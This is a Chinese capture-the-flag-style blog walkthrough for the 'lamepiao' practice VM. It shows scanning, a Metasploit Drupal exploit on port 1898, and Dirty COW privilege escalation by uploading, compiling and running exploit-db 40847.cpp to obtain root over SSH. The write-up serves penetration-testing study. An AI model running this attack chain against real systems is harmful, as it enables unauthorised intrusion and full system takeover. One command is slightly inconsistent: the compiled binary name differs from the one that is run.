lamepiao靶机渗透测试

还是扫描同网段的靶机,扫描开放端口

明显192.168.52.135是,扫面下端口,开放了80和22

第二次扫描出来1898端口

访问下1898端口

 

dirb http://192.168.52.135:1898,敏感目录很多

(这里也可以使用dirsearch等扫描软件) 

通过泄露的信息,找到了apache的版本号和操作系统等指纹信息。

根据信息百度搜索发现Drupal的漏洞,打开msf框架

msfconsole//打开msf

search 名称 //找漏洞

use 漏洞名称或者编号//使用

show options //配置参数

run //启动

看看需要配置那些参数,

配置下攻击ip就可以了,

set rhosts 192.168.52.135

set rport 1898

Run就可以了

这里存在脏牛漏洞,

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。或者直接在kali上输入,这里使用40847.cpp,其他的可能会使靶机崩溃。

新打开一个命令行窗口

searchsploit dirty


upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp //将文件传上靶机

 

提权

先进入自带的shell模块,然后利用python的pty模块获得一个shell,然后进入数据库

python -c "import pty;pty.spawn('/bin/bash')"

在tmp目录下对40847.cpp文件进行编译:

g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil  

运行:

./dcow -s

获得root密码

dirtyCowFun

利用ssh登录

ssh root@192.168.52.135  

随便打的回显是这样的不知道为什么

登上去找到flag打开就行

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值